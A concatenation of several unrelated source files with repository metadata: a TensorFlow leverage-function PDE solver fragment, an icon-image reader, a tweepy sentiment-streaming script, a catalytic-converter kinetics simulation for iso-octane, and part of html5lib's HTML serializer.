delta_y = tf.math.reduce_min(grid[1][0, 1:] - grid[1][0, :-1])
# Initialize leverage function L(t=0, S) = 1
leverage_fn = functools.partial(
linear.interpolate, x_data=[[0.0, 1.0]], y_data=[[1.0, 1.0]], dtype=dtype)
def _initial_value():
"""Computes initial value as a delta function delta(log_spot(t), var(0))."""
log_spot, variance = tf.meshgrid(*grid)
init_value = tf.where(
tf.math.logical_and(
tf.math.abs(log_spot - scaled_initial_point[0]) <
delta_x + pde_grid_tol,
tf.math.abs(variance - scaled_initial_point[1]) <
delta_y + pde_grid_tol), 1.0 / (delta_x * delta_y * 4), 0.0)
# initial_value.shape = (1, num_grid_x, num_grid_y)
return tf.expand_dims(init_value, axis=0)
def _second_order_coeff_fn(t, grid):
log_spot = grid[0] + x_scale
variance = grid[1] * y_scale
leverage_fn_t_x = leverage_fn(log_spot)
val_xx = 0.5 * variance * leverage_fn_t_x**2
val_xy = 0.5 * (rho * tf.math.sqrt(variance) * leverage_fn_t_x *
variance_model.volatility_fn()(t, variance)) / y_scale
val_yx = val_xy
val_yy = 0.5 * variance_model.volatility_fn()(t, variance)**2 / y_scale**2
# return list of shape = (2,2). Each element has shape = grid.shape
return [[-val_yy, -val_yx], [-val_xy, -val_xx]]
def _first_order_coeff_fn(t, grid):
log_spot = grid[0] + x_scale
variance = grid[1] * y_scale
leverage_fn_t_x = leverage_fn(log_spot)
val_x = (risk_free_rate - dividend_yield -
0.5 * variance * leverage_fn_t_x**2)
val_y = variance_model.drift_fn()(t, variance)
# return list of shape = (2,). Each element has shape = grid.shape
return [val_y / y_scale, val_x]
def _compute_leverage_fn(t, coord_grid, value_grid):
log_spot = tf.expand_dims(coord_grid[0], axis=-1) + x_scale
local_volatility_values = lv_model.local_volatility_fn()(
t, tf.math.exp(log_spot))
# TODO(b/176826650): Large values represent instability. Eventually this
# should be addressed inside local vol model.
local_volatility_values = tf.where(
tf.math.abs(local_volatility_values) > 1e4, 0.0,
local_volatility_values)
# variance_given_logspot.shape = (num_grid_x, 1)
variance_given_logspot = _conditional_expected_variance_from_pde_solution(
[coord_grid[0] + x_scale, coord_grid[1] * y_scale], value_grid, dtype)(
log_spot)
leverage_fn_values = tf.math.divide_no_nan(
local_volatility_values, tf.math.sqrt(variance_given_logspot))
leverage_fn = functools.partial(
linear.interpolate,
x_data=grid[0] + x_scale,
y_data=tf.transpose(leverage_fn_values),
dtype=dtype)
return leverage_fn
@pde.boundary_conditions.neumann
def _trivial_neumann_boundary(t, location_grid):
del t, location_grid
return 0.0
leverage_fn_values = []
leverage_fn_values.append(leverage_fn(grid[0][0])[0])
# joint_density.shape = (1, num_grid_x, num_grid_y)
joint_density = _initial_value()
for tstart in np.arange(0.0, max_time, time_step):
joint_density, coord_grid, _, _ = pde.fd_solvers.solve_forward(
tstart,
tstart + time_step,
coord_grid=[grid[0][0], grid[1][0]],
values_grid=joint_density,
time_step=time_step / 10.0,
values_transform_fn=None,
inner_second_order_coeff_fn=_second_order_coeff_fn,
inner_first_order_coeff_fn=_first_order_coeff_fn,
zeroth_order_coeff_fn=None,
boundary_conditions=[[
_trivial_neumann_boundary, _trivial_neumann_boundary
], [_trivial_neumann_boundary, _trivial_neumann_boundary]],
dtype=dtype)
joint_density = tf.math.maximum(joint_density, 0.0)
area_under_joint_density = _two_d_integration(
[grid[0][0, :], grid[1][0, :]], joint_density)
joint_density = joint_density / area_under_joint_density
# TODO(b/176826743): Perform fixed point iteration instead of one step
# update
leverage_fn = _compute_leverage_fn(
tf.convert_to_tensor(tstart + time_step), coord_grid, joint_density)
leverage_fn_values.append(leverage_fn(grid[0][0, :] + x_scale)[0, :])
# leverage_fn_values.shape = (num_pde_timesteps, num_grid_x,)
leverage_fn_values = tf.convert_to_tensor(leverage_fn_values, dtype=dtype)
times = tf.range(0.0, max_time + time_step, time_step, dtype=dtype)
def _return_fn(t, spot):
leverage_fn_interpolator = (
math.interpolation.interpolation_2d.Interpolation2D(
x_data=[times],
y_data=tf.expand_dims(
tf.repeat(grid[0] + x_scale, times.shape[0], axis=0), axis=0),
z_data=tf.expand_dims(leverage_fn_values, axis=0),
dtype=dtype))
return leverage_fn_interpolator.interpolate(t, tf.math.log(spot))
return _return_fn
| [
"tf-quant-finance-robot@google.com"
] | tf-quant-finance-robot@google.com |
e0c77c4ae13d656c7c5a7e9bd4f0314f052b9c54 | 0a87b342e79bcd86e6ed75a41938d6f7308976ae | /mm/editor/motif/bandwidthbadicon.py | 2fc7a53f2501efa1a653fde8caeedea61e17adc4 | [
"MIT"
] | permissive | scooter23/grins | 3f54f8d81a318b7dac3dd507040c33c7b6ec1edc | 7ac661912dd77d474cf3deba522d815fb906efcc | refs/heads/master | 2021-06-13T12:10:43.898100 | 2017-03-06T23:11:33 | 2017-03-06T23:11:33 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,210 | py | __version__ = "$Id$"
import imgformat
import struct
_bigendian = struct.pack('i', 1)[0] == '\0'
class reader:
def __init__(self):
self.width = 16
self.height = 16
format = imgformat.colormap
self.format = format
self.format_choices = (format,)
import imgcolormap
if _bigendian:
self.colormap = imgcolormap.new('''\
\0\0\0\0\0\1\1\1\0\0\0\377\0\377\377\377''')
else:
self.colormap = imgcolormap.new('''\
\0\0\0\0\1\1\1\0\377\0\0\0\377\377\377\0''')
self.transparent = 1
self.top = 0
self.left = 0
self.aspect = 0
def read(self):
return '''\
\1\1\1\1\1\1\1\1\1\1\1\1\1\1\1\1\1\1\1\1\1\1\1\1\1\1\1\1\1\1\1\1\1\1\1\1\
\1\1\1\0\0\0\0\1\1\1\1\1\1\1\1\1\1\1\0\2\2\2\2\0\1\1\1\1\1\1\0\0\0\0\0\2\
\2\2\2\0\0\0\1\1\1\0\3\0\2\2\2\2\2\2\2\2\2\2\0\1\1\0\3\0\2\2\2\2\2\2\2\2\
\2\2\0\1\1\0\3\0\2\2\2\2\2\2\2\2\2\2\0\1\1\0\3\0\2\2\2\2\2\2\2\2\2\2\0\1\
\1\1\0\0\0\0\0\2\2\2\2\0\0\0\1\1\1\1\1\1\1\1\0\2\2\2\2\0\1\1\1\1\1\1\1\1\
\1\1\1\0\0\0\0\1\1\1\1\1\1\1\1\1\1\1\1\1\1\1\1\1\1\1\1\1\1\1\1\1\1\1\1\1\
\1\1\1\1\1\1\1\1\1\1\1\1\1\1\1\1\1\1\1\1\1\1\1\1\1\1\1\1\1\1\1\1\1\1\1\1\
\1\1\1\1'''
| [
"sjoerdmullender@users.noreply.github.com"
] | sjoerdmullender@users.noreply.github.com |
12a600277c5664b9624e6e9a05ad727b99875ff9 | 1826b207b33c2fda8c4ca227f344021a782d5311 | /twitter_filter.py | 14f4cf763f1a46fb3f4b772dc2cc3edf5fc444d2 | [] | no_license | 532839167/Streaming_Twitter_Filter_and_Sentiment_Analyzer | 5c8a78716048d49282b65a525461b6b8af21760b | c6097543964f590d5d42ad8f842cfd880fc89ece | refs/heads/main | 2023-06-18T15:06:39.331176 | 2021-07-16T23:01:10 | 2021-07-16T23:01:10 | 386,505,835 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,896 | py | import tweepy
import datetime
import json
import re
from tweet_analyzer import TweetAnalyzer
from tweet_store import TweetStore
from langdetect import detect
from langdetect import DetectorFactory
file_path = 'config/api.json'
with open(file_path) as f:
twitter_api = json.loads(f.read())
consumer_key = twitter_api['consumer_key']
consumer_secret = twitter_api['consumer_secret']
access_token = twitter_api['access_token']
access_token_secret = twitter_api['access_token_secret']
auth = tweepy.OAuthHandler(consumer_key, consumer_secret)
auth.set_access_token(access_token, access_token_secret)
api = tweepy.API(auth)
store = TweetStore()
DetectorFactory.seed = 0
class StreamListener(tweepy.StreamListener):
def on_status(self, status):
flag = re.search('[a-zA-Z]', status.text) and ('RT @' not in status.text)
if flag and (detect(status.text) == 'en'):
analyzer = TweetAnalyzer()
polarity = analyzer.predict(status.text)
# polarity = sent.polarity
# subjectivity = sent.subjectivity
tweet_item = {
'id_str': status.id_str,
'text': status.text,
'polarity': polarity,
# 'subjectivity': subjectivity,
'username': status.user.screen_name,
'name': status.user.name,
'profile_image_url': status.user.profile_image_url,
'received_at': datetime.datetime.now().strftime("%Y-%m-%d %H:%M:%S")
}
store.push(tweet_item)
print("Pushed to redis:", tweet_item)
def on_error(self, status_code):
if status_code == 420:
return False
stream_listener = StreamListener()
stream = tweepy.Stream(auth=api.auth, listener=stream_listener)
stream.filter(track=["@Facebook", "@Microsoft", "@Apple", "@Google", "@Amazon", "@Netfilix"])
| [
"jinsong99598@gmail.com"
] | jinsong99598@gmail.com |
b8b2af93b730f68a65bcde03cb8027561c905d39 | f8fe6eec5dc1200a112a13dcd2102af4fccf2417 | /scripts/python/catalyst/updatedTWC/iso-octane.py | d5499b4325f67c7a245739ee71f4efc26082e693 | [
"MIT"
] | permissive | aladshaw3/cats | c507b01c97a0aebf69aae1d6a12a3df20805527a | 289fdc0712cbb1c000dd42a84f5a7eb57e848cdc | refs/heads/master | 2023-08-31T06:33:07.571570 | 2023-08-19T04:53:58 | 2023-08-19T04:53:58 | 245,455,360 | 5 | 4 | MIT | 2023-09-03T16:22:27 | 2020-03-06T15:33:35 | Assembly | UTF-8 | Python | false | false | 10,972 | py | # This file is a demo for the 'Isothermal_Monolith_Simulator' object
import sys
sys.path.append('../..')
from catalyst.isothermal_monolith_catalysis import *
# Give x, y, z for the HC (CxHyOz)
HC_name = "iso-octane"
x = 8
y = 18
z = 0
O2_in = 7300
CO2_in = 130000
H2O_in = 130000
CO_in = 5000 #5070
H2_in = 1670
NO_in = 1070 #1040
NH3_in = 0
N2O_in = 0
HC_in = 3000/x
custom_zaxis = [0,0.1,0.2,0.3,0.4,0.5,0.6,0.7,0.8,0.9,1.0,
1.2,1.4,1.6,1.8,2.0,2.2,2.4,2.6,2.8,3.0,
3.25, 3.5, 3.75, 4.0, 4.5, 5]
data = naively_read_data_file("inputfiles/"+HC_name+"_lightoff_history.txt",factor=2)
temp_data = naively_read_data_file("inputfiles/"+HC_name+"_temp_history.txt",factor=2)
time_list = time_point_selector(data["time"], data, end_time=54)
sim = Isothermal_Monolith_Simulator()
sim.add_axial_dim(point_list=custom_zaxis)
sim.add_axial_dataset(5)
sim.add_temporal_dim(point_list=time_list)
sim.add_temporal_dataset(data["time"])
sim.add_age_set("A0")
sim.add_data_age_set("A0")
sim.add_temperature_set("T0")
sim.add_data_temperature_set("T0")
sim.add_gas_species(["HC","CO","NO","N2O","NH3","H2","O2","H2O","CO2"])
sim.add_data_gas_species(["HC","CO","NO","N2O","NH3"])
sim.set_data_values_for("HC","A0","T0",5,data["time"],data["HC"])
sim.set_data_values_for("CO","A0","T0",5,data["time"],data["CO"])
sim.set_data_values_for("NO","A0","T0",5,data["time"],data["NO"])
sim.set_data_values_for("N2O","A0","T0",5,data["time"],data["N2O"])
sim.set_data_values_for("NH3","A0","T0",5,data["time"],data["NH3"])
sim.add_reactions({
# CO + 0.5 O2 --> CO2
"r1": ReactionType.Arrhenius,
# H2 + 0.5 O2 --> H2O
"r2": ReactionType.Arrhenius,
# CO + NO --> CO2 (+ 0.5 N2)
"r4": ReactionType.Arrhenius,
# CO + 2 NO --> CO2 + N2O
"r5": ReactionType.Arrhenius,
# 2.5 CO + NO + 1.5 H2O --> 2.5 CO2 + NH3
"r8": ReactionType.Arrhenius,
# CO + H2O <-- --> CO2 + H2
"r11": ReactionType.EquilibriumArrhenius,
# 2.5 H2 + NO --> NH3 + H2O
"r6": ReactionType.Arrhenius,
# H2 + NO --> H2O (+ 0.5 N2)
"r7": ReactionType.Arrhenius,
# H2 + 2 NO --> N2O + H2O
"r14": ReactionType.Arrhenius,
# NH3 + NO + 0.25 O2 --> 1.5 H2O (+ N2)
"r15": ReactionType.Arrhenius,
# HC oxidation
# CxHyOz + (x + (y/4) - (z/2)) O2 --> x CO2 + (y/2) H2O
"r3": ReactionType.Arrhenius,
# HC Steam Reforming
# CxHyOz + (x-z) H2O --> x CO + (x + (y/2) - z) H2
"r12": ReactionType.Arrhenius,
# HC NO reduction
# CxHyOz + (2x + (y/2) - z) NO --> x CO2 + (y/2) H2O + (x + (y/4) - (z/2)) N2
"r10": ReactionType.Arrhenius,
})
sim.set_bulk_porosity(0.775)
sim.set_washcoat_porosity(0.4)
sim.set_reactor_radius(1)
sim.set_space_velocity_all_runs(500)
sim.set_cell_density(93)
# CO + 0.5 O2 --> CO2
r1 = {"parameters": {"A": 1.6550871137667489e+31, "E": 235293.33281046877},
"mol_reactants": {"CO": 1, "O2": 0.5},
"mol_products": {"CO2": 1},
"rxn_orders": {"CO": 1, "O2": 1}
}
# H2 + 0.5 O2 --> H2O
r2 = {"parameters": {"A": 1.733658868809338e+24, "E": 158891.38869742613},
"mol_reactants": {"H2": 1, "O2": 0.5},
"mol_products": {"H2O": 1},
"rxn_orders": {"H2": 1, "O2": 1}
}
# CO + NO --> CO2 (+ 0.5 N2)
r4 = {"parameters": {"A": 3.473335911420499e+36, "E": 304924.98618328216},
"mol_reactants": {"CO": 1, "NO": 1},
"mol_products": {"CO2": 1},
"rxn_orders": {"CO": 1, "NO": 1}
}
# CO + 2 NO --> CO2 + N2O
r5 = {"parameters": {"A": 3.174729324826581e+22, "E": 170429.67328083533},
"mol_reactants": {"CO": 1, "NO": 2},
"mol_products": {"CO2": 1, "N2O": 1},
"rxn_orders": {"CO": 1, "NO": 1}
}
# 2.5 CO + NO + 1.5 H2O --> 2.5 CO2 + NH3
r8 = {"parameters": {"A": 1.8767305119846367e+38, "E": 304127.76066024584},
"mol_reactants": {"CO": 2.5, "NO": 1, "H2O": 1.5},
"mol_products": {"CO2": 2.5, "NH3": 1},
"rxn_orders": {"CO": 1, "NO": 1, "H2O": 1}
}
# CO + H2O <-- --> CO2 + H2
r11 = {"parameters": {"A": 1.8429782328496848e+17, "E": 136610.55181420766,
"dH": 16769.16637626293, "dS": 139.10839203326302},
"mol_reactants": {"CO": 1, "H2O": 1},
"mol_products": {"H2": 1, "CO2": 1},
"rxn_orders": {"CO": 1, "H2O": 1, "CO2": 1, "H2": 1}
}
# 2.5 H2 + NO --> NH3 + H2O
r6 = {"parameters": {"A": 9.075483439125227e+16, "E": 90733.41643967327},
"mol_reactants": {"H2": 2.5, "NO": 1},
"mol_products": {"NH3": 1, "H2O": 1},
"rxn_orders": {"H2": 1, "NO": 1}
}
# H2 + NO --> H2O (+ 0.5 N2)
r7 = {"parameters": {"A": 190025116968837.8, "E": 62830.56919380204},
"mol_reactants": {"H2": 1, "NO": 1},
"mol_products": {"H2O": 1},
"rxn_orders": {"H2": 1, "NO": 1}
}
# H2 + 2 NO --> N2O + H2O
r14 = {"parameters": {"A": 606598964637.8237, "E": 43487.90521352834},
"mol_reactants": {"H2": 1, "NO": 2},
"mol_products": {"N2O": 1, "H2O": 1},
"rxn_orders": {"H2": 1, "NO": 1}
}
# NOTE: It is believed that HCs should have HIGHER activation energies than CO
# NH3 + NO + 0.25 O2 --> 1.5 H2O (+ N2)
r15 = {"parameters": {"A": 1.0E+41, "E": 300000},
"mol_reactants": {"NH3": 1, "NO": 1, "O2": 0.25},
"mol_products": {"H2O": 1.5},
"rxn_orders": {"NH3": 1, "NO": 1, "O2": 1}
}
# HC oxidation
# CxHyOz + (x + (y/4) - (z/2)) O2 --> x CO2 + (y/2) H2O
r3 = {"parameters": {"A": 1.689916847226846e+18, "E": 124704.19832103234},
"mol_reactants": {"HC": 1, "O2": (x + y/4 - z/2)},
"mol_products": {"H2O": y/2, "CO2": x},
"rxn_orders": {"HC": 1, "O2": 1}
}
# HC NO reduction
# CxHyOz + (2x + (y/2) - z) NO --> x CO2 + (y/2) H2O + (x + (y/4) - (z/2)) N2
r10 = {"parameters": {"A": 8.592122512925783e+24, "E": 251566.45460992216},
"mol_reactants": {"HC": 1, "NO": (2*x + y/2 - z)},
"mol_products": {"H2O": y/2, "CO2": x},
"rxn_orders": {"HC": 1, "NO": 1}
}
# HC Steam Reforming
# CxHyOz + (x-z) H2O --> x CO + (x + (y/2) - z) H2
r12 = {"parameters": {"A": 4.8431702008771064e+15, "E": 125210.01500049492},
"mol_reactants": {"HC": 1, "H2O": x - z},
"mol_products": {"CO": x, "H2": (x + y/2 - z)},
"rxn_orders": {"HC": 1, "H2O": 1}
}
sim.set_reaction_info("r1", r1)
sim.set_reaction_info("r4", r4)
sim.set_reaction_info("r5", r5)
sim.set_reaction_info("r8", r8)
sim.set_reaction_info("r2", r2)
sim.set_reaction_info("r11", r11)
sim.set_reaction_info("r6", r6)
sim.set_reaction_info("r7", r7)
sim.set_reaction_info("r14", r14)
sim.set_reaction_info("r15", r15)
sim.set_reaction_info("r3", r3)
sim.set_reaction_info("r12", r12)
sim.set_reaction_info("r10", r10)
sim.build_constraints()
sim.discretize_model(method=DiscretizationMethod.FiniteDifference,
tstep=90,elems=20,colpoints=2)
# Setup temperature information from data
sim.set_temperature_from_data("A0", "T0", temp_data, {"T_in": 0, "T_mid": 2.5, "T_out": 5})
# ICs in ppm
sim.set_const_IC_in_ppm("HC","A0","T0",HC_in)
sim.set_const_IC_in_ppm("CO","A0","T0",CO_in)
sim.set_const_IC_in_ppm("NO","A0","T0",NO_in)
sim.set_const_IC_in_ppm("N2O","A0","T0",N2O_in)
sim.set_const_IC_in_ppm("NH3","A0","T0",NH3_in)
sim.set_const_IC_in_ppm("H2","A0","T0",H2_in)
sim.set_const_IC_in_ppm("O2","A0","T0",O2_in)
sim.set_const_IC_in_ppm("H2O","A0","T0",H2O_in)
sim.set_const_IC_in_ppm("CO2","A0","T0",CO2_in)
# BCs in ppm
sim.set_const_BC_in_ppm("HC","A0","T0",HC_in, auto_init=True)
sim.set_const_BC_in_ppm("CO","A0","T0",CO_in, auto_init=True)
sim.set_const_BC_in_ppm("NO","A0","T0",NO_in, auto_init=True)
sim.set_const_BC_in_ppm("N2O","A0","T0",N2O_in, auto_init=True)
sim.set_const_BC_in_ppm("NH3","A0","T0",NH3_in, auto_init=True)
sim.set_const_BC_in_ppm("H2","A0","T0",H2_in, auto_init=True)
sim.set_const_BC_in_ppm("O2","A0","T0",O2_in, auto_init=True)
sim.set_const_BC_in_ppm("H2O","A0","T0",H2O_in, auto_init=True)
sim.set_const_BC_in_ppm("CO2","A0","T0",CO2_in, auto_init=True)
# Fix all reactions for simulation mode only
sim.fix_all_reactions()
# ========== Selecting weight factors
sim.auto_select_all_weight_factors()
sim.ignore_weight_factor("N2O","A0","T0",time_window=(0,110))
sim.ignore_weight_factor("CO","A0","T0",time_window=(0,110))
#sim.ignore_weight_factor("NO","A0","T0",time_window=(0,110))
#sim.ignore_weight_factor("NH3","A0","T0",time_window=(0,110))
sim.initialize_auto_scaling()
sim.initialize_simulator(console_out=False,
restart_on_warning=True,
restart_on_error=True,
use_old_times=True)
sim.finalize_auto_scaling()
sim.run_solver()
name = HC_name+"_CO"
sim.plot_vs_data("CO", "A0", "T0", 5, display_live=False, file_name=name)
name = HC_name+"_NO"
sim.plot_vs_data("NO", "A0", "T0", 5, display_live=False, file_name=name)
name = HC_name+"_HC"
sim.plot_vs_data("HC", "A0", "T0", 5, display_live=False, file_name=name)
name = HC_name+"_NH3"
sim.plot_vs_data("NH3", "A0", "T0", 5, display_live=False, file_name=name)
name = HC_name+"_N2O"
sim.plot_vs_data("N2O", "A0", "T0", 5, display_live=False, file_name=name)
sim.plot_at_times(["CO"], ["A0"], ["T0"], [30, 35, 40, 45, 50],
display_live=False, file_name=HC_name+"_CO-profile-out")
sim.plot_at_times(["O2"], ["A0"], ["T0"], [30, 35, 40, 45, 50],
display_live=False, file_name=HC_name+"_O2-profile-out")
sim.plot_at_times(["HC"], ["A0"], ["T0"], [30, 35, 40, 45, 50],
display_live=False, file_name=HC_name+"_HC-profile-out")
sim.plot_at_times(["NO"], ["A0"], ["T0"], [30, 35, 40, 45, 50],
display_live=False, file_name=HC_name+"_NO-profile-out")
sim.plot_at_locations(["O2"], ["A0"], ["T0"], [0, 5], display_live=False, file_name=HC_name+"_O2-out")
sim.plot_at_locations(["H2"], ["A0"], ["T0"], [0, 5], display_live=False, file_name=HC_name+"_H2-out")
sim.print_results_of_breakthrough(["HC","CO","NO","NH3","N2O","H2","O2","H2O"],
"A0", "T0", file_name=HC_name+"_lightoff.txt", include_temp=True)
sim.print_results_of_integral_average(["CO","NO","HC"], "A0", "T0", file_name=HC_name+"_avgs-used-for-inhibition.txt")
sim.print_kinetic_parameter_info(file_name=HC_name+"_params.txt")
sim.save_model_state(file_name=HC_name+"_model.json")
| [
"ladshawap@ornl.gov"
] | ladshawap@ornl.gov |
213764349b4e9124de51c7db642daabac88ec7af | 454976b8d4f22f236097909d5c97262da66cb596 | /cangdan-test/venv/Lib/site-packages/pip-19.0.3-py3.8.egg/pip/_vendor/html5lib/serializer.py | 8efdfa5c6e2e843753626f1281c9e38912dcce30 | [] | no_license | butaihuiwan/cangdan | 6143f521ce490f2ee0151a4bb60ca964e88cbaa0 | 28ccb35c0de98aa3753c7f3809979d0b00bddfe0 | refs/heads/master | 2023-02-05T20:34:50.023866 | 2020-12-22T15:50:10 | 2020-12-22T15:50:10 | 323,663,229 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 15,763 | py | from __future__ import absolute_import, division, unicode_literals
from pip._vendor.six import text_type
import re
from codecs import register_error, xmlcharrefreplace_errors
from .constants import voidElements, booleanAttributes, spaceCharacters
from .constants import rcdataElements, entities, xmlEntities
from . import treewalkers, _utils
from xml.sax.saxutils import escape
_quoteAttributeSpecChars = "".join(spaceCharacters) + "\"'=<>`"
_quoteAttributeSpec = re.compile("[" + _quoteAttributeSpecChars + "]")
_quoteAttributeLegacy = re.compile("[" + _quoteAttributeSpecChars +
"\x00\x01\x02\x03\x04\x05\x06\x07\x08\t\n"
"\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15"
"\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f"
"\x20\x2f\x60\xa0\u1680\u180e\u180f\u2000"
"\u2001\u2002\u2003\u2004\u2005\u2006\u2007"
"\u2008\u2009\u200a\u2028\u2029\u202f\u205f"
"\u3000]")
_encode_entity_map = {}
_is_ucs4 = len("\U0010FFFF") == 1
for k, v in list(entities.items()):
# skip multi-character entities
if ((_is_ucs4 and len(v) > 1) or
(not _is_ucs4 and len(v) > 2)):
continue
if v != "&":
if len(v) == 2:
v = _utils.surrogatePairToCodepoint(v)
else:
v = ord(v)
if v not in _encode_entity_map or k.islower():
# prefer < over < and similarly for &, >, etc.
_encode_entity_map[v] = k
def htmlentityreplace_errors(exc):
if isinstance(exc, (UnicodeEncodeError, UnicodeTranslateError)):
res = []
codepoints = []
skip = False
for i, c in enumerate(exc.object[exc.start:exc.end]):
if skip:
skip = False
continue
index = i + exc.start
if _utils.isSurrogatePair(exc.object[index:min([exc.end, index + 2])]):
codepoint = _utils.surrogatePairToCodepoint(exc.object[index:index + 2])
skip = True
else:
codepoint = ord(c)
codepoints.append(codepoint)
for cp in codepoints:
e = _encode_entity_map.get(cp)
if e:
res.append("&")
res.append(e)
if not e.endswith(";"):
res.append(";")
else:
res.append("&#x%s;" % (hex(cp)[2:]))
return ("".join(res), exc.end)
else:
return xmlcharrefreplace_errors(exc)
register_error("htmlentityreplace", htmlentityreplace_errors)
def serialize(input, tree="etree", encoding=None, **serializer_opts):
"""Serializes the input token stream using the specified treewalker
:arg input: the token stream to serialize
:arg tree: the treewalker to use
:arg encoding: the encoding to use
:arg serializer_opts: any options to pass to the
:py:class:`html5lib.serializer.HTMLSerializer` that gets created
:returns: the tree serialized as a string
Example:
>>> from html5lib.html5parser import parse
>>> from html5lib.serializer import serialize
>>> token_stream = parse('<html><body><p>Hi!</p></body></html>')
>>> serialize(token_stream, omit_optional_tags=False)
'<html><head></head><body><p>Hi!</p></body></html>'
"""
# XXX: Should we cache this?
walker = treewalkers.getTreeWalker(tree)
s = HTMLSerializer(**serializer_opts)
return s.render(walker(input), encoding)
class HTMLSerializer(object):
# attribute quoting options
quote_attr_values = "legacy" # be secure by default
quote_char = '"'
use_best_quote_char = True
# tag syntax options
omit_optional_tags = True
minimize_boolean_attributes = True
use_trailing_solidus = False
space_before_trailing_solidus = True
# escaping options
escape_lt_in_attrs = False
escape_rcdata = False
resolve_entities = True
# miscellaneous options
alphabetical_attributes = False
inject_meta_charset = True
strip_whitespace = False
sanitize = False
options = ("quote_attr_values", "quote_char", "use_best_quote_char",
"omit_optional_tags", "minimize_boolean_attributes",
"use_trailing_solidus", "space_before_trailing_solidus",
"escape_lt_in_attrs", "escape_rcdata", "resolve_entities",
"alphabetical_attributes", "inject_meta_charset",
"strip_whitespace", "sanitize")
def __init__(self, **kwargs):
"""Initialize HTMLSerializer
:arg inject_meta_charset: Whether or not to inject the meta charset.
Defaults to ``True``.
:arg quote_attr_values: Whether to quote attribute values that don't
require quoting per legacy browser behavior (``"legacy"``), when
required by the standard (``"spec"``), or always (``"always"``).
Defaults to ``"legacy"``.
:arg quote_char: Use given quote character for attribute quoting.
Defaults to ``"`` which will use double quotes unless attribute
value contains a double quote, in which user_case single quotes are
used.
:arg escape_lt_in_attrs: Whether or not to escape ``<`` in attribute
values.
Defaults to ``False``.
:arg escape_rcdata: Whether to escape characters that need to be
escaped within normal elements within rcdata elements such as
style.
Defaults to ``False``.
:arg resolve_entities: Whether to resolve named character entities that
appear in the source tree. The XML predefined entities < >
& " ' are unaffected by this setting.
Defaults to ``True``.
:arg strip_whitespace: Whether to remove semantically meaningless
whitespace. (This compresses all whitespace to a single space
except within ``pre``.)
Defaults to ``False``.
:arg minimize_boolean_attributes: Shortens boolean attributes to give
just the attribute value, for example::
<input disabled="disabled">
becomes::
<input disabled>
Defaults to ``True``.
:arg use_trailing_solidus: Includes a close-tag slash at the end of the
start tag of void elements (empty elements whose end tag is
forbidden). E.g. ``<hr/>``.
Defaults to ``False``.
:arg space_before_trailing_solidus: Places a space immediately before
the closing slash in a tag using a trailing solidus. E.g.
``<hr />``. Requires ``use_trailing_solidus=True``.
Defaults to ``True``.
:arg sanitize: Strip all unsafe or unknown constructs from output.
See :py:class:`html5lib.filters.sanitizer.Filter`.
Defaults to ``False``.
:arg omit_optional_tags: Omit start/end tags that are optional.
Defaults to ``True``.
:arg alphabetical_attributes: Reorder attributes to be in alphabetical order.
Defaults to ``False``.
"""
unexpected_args = frozenset(kwargs) - frozenset(self.options)
if len(unexpected_args) > 0:
raise TypeError("__init__() got an unexpected keyword argument '%s'" % next(iter(unexpected_args)))
if 'quote_char' in kwargs:
self.use_best_quote_char = False
for attr in self.options:
setattr(self, attr, kwargs.get(attr, getattr(self, attr)))
self.errors = []
self.strict = False
def encode(self, string):
assert(isinstance(string, text_type))
if self.encoding:
return string.encode(self.encoding, "htmlentityreplace")
else:
return string
def encodeStrict(self, string):
assert(isinstance(string, text_type))
if self.encoding:
return string.encode(self.encoding, "strict")
else:
return string
def serialize(self, treewalker, encoding=None):
# pylint:disable=too-many-nested-blocks
self.encoding = encoding
in_cdata = False
self.errors = []
if encoding and self.inject_meta_charset:
from .filters.inject_meta_charset import Filter
treewalker = Filter(treewalker, encoding)
# Alphabetical attributes is here under the assumption that none of
# the later filters add or change order of attributes; it needs to be
# before the sanitizer so escaped elements come out correctly
if self.alphabetical_attributes:
from .filters.alphabeticalattributes import Filter
treewalker = Filter(treewalker)
# WhitespaceFilter should be used before OptionalTagFilter
# for maximum efficiently of this latter filter
if self.strip_whitespace:
from .filters.whitespace import Filter
treewalker = Filter(treewalker)
if self.sanitize:
from .filters.sanitizer import Filter
treewalker = Filter(treewalker)
if self.omit_optional_tags:
from .filters.optionaltags import Filter
treewalker = Filter(treewalker)
for token in treewalker:
type = token["type"]
if type == "Doctype":
doctype = "<!DOCTYPE %s" % token["name"]
if token["publicId"]:
doctype += ' PUBLIC "%s"' % token["publicId"]
elif token["systemId"]:
doctype += " SYSTEM"
if token["systemId"]:
if token["systemId"].find('"') >= 0:
if token["systemId"].find("'") >= 0:
self.serializeError("System identifer contains both single and double quote characters")
quote_char = "'"
else:
quote_char = '"'
doctype += " %s%s%s" % (quote_char, token["systemId"], quote_char)
doctype += ">"
yield self.encodeStrict(doctype)
elif type in ("Characters", "SpaceCharacters"):
if type == "SpaceCharacters" or in_cdata:
if in_cdata and token["data"].find("</") >= 0:
self.serializeError("Unexpected </ in CDATA")
yield self.encode(token["data"])
else:
yield self.encode(escape(token["data"]))
elif type in ("StartTag", "EmptyTag"):
name = token["name"]
yield self.encodeStrict("<%s" % name)
if name in rcdataElements and not self.escape_rcdata:
in_cdata = True
elif in_cdata:
self.serializeError("Unexpected child element of a CDATA element")
for (_, attr_name), attr_value in token["data"].items():
# TODO: Add namespace support here
k = attr_name
v = attr_value
yield self.encodeStrict(' ')
yield self.encodeStrict(k)
if not self.minimize_boolean_attributes or \
(k not in booleanAttributes.get(name, tuple()) and
k not in booleanAttributes.get("", tuple())):
yield self.encodeStrict("=")
if self.quote_attr_values == "always" or len(v) == 0:
quote_attr = True
elif self.quote_attr_values == "spec":
quote_attr = _quoteAttributeSpec.search(v) is not None
elif self.quote_attr_values == "legacy":
quote_attr = _quoteAttributeLegacy.search(v) is not None
else:
raise ValueError("quote_attr_values must be one of: "
"'always', 'spec', or 'legacy'")
v = v.replace("&", "&")
if self.escape_lt_in_attrs:
v = v.replace("<", "<")
if quote_attr:
quote_char = self.quote_char
if self.use_best_quote_char:
if "'" in v and '"' not in v:
quote_char = '"'
elif '"' in v and "'" not in v:
quote_char = "'"
if quote_char == "'":
v = v.replace("'", "'")
else:
v = v.replace('"', """)
yield self.encodeStrict(quote_char)
yield self.encode(v)
yield self.encodeStrict(quote_char)
else:
yield self.encode(v)
